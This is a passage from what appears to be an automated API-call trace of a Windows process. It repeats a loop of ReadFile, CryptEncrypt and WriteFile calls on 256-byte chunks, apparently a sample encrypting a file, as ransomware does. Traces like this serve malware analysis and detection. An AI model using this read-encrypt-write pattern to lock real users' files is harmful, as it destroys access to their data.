lpOverlapped=0x0) returned 1 [0148.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.645] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.645] GetLastError () returned 0x0 [0148.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.645] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.645] GetLastError () returned 0x0 [0148.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.645] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.645] GetLastError () returned 0x0 [0148.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.645] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.645] GetLastError () returned 0x0 [0148.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.645] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.645] GetLastError () returned 0x0 [0148.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.646] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.646] GetLastError () returned 0x0 [0148.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.646] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.646] GetLastError () returned 0x0 [0148.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.646] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.646] GetLastError () returned 0x0 [0148.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.646] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.646] GetLastError () returned 0x0 [0148.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.646] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.646] GetLastError () returned 0x0 [0148.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.646] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.646] GetLastError () returned 0x0 [0148.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.646] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.647] GetLastError () returned 0x0 [0148.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.647] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.647] GetLastError () returned 0x0 [0148.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.647] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.647] GetLastError () returned 0x0 [0148.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.647] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.647] GetLastError () returned 0x0 [0148.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.647] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.647] GetLastError () returned 0x0 [0148.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.647] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.647] GetLastError () returned 0x0 [0148.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.647] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.648] GetLastError () returned 0x0 [0148.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.648] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.648] GetLastError () returned 0x0 [0148.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.648] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.648] GetLastError () returned 0x0 [0148.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.648] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.648] GetLastError () returned 0x0 [0148.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.648] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.648] GetLastError () returned 0x0 [0148.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.648] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.648] GetLastError () returned 0x0 [0148.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.648] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.648] GetLastError () returned 0x0 [0148.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.649] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.649] GetLastError () returned 0x0 [0148.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.649] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.649] GetLastError () returned 0x0 [0148.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.649] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.649] GetLastError () returned 0x0 [0148.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.650] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.650] GetLastError () returned 0x0 [0148.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.650] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.650] GetLastError () returned 0x0 [0148.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.650] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.650] GetLastError () returned 0x0 [0148.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.650] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.650] GetLastError () returned 0x0 [0148.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.650] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.650] GetLastError () returned 0x0 [0148.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.650] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: 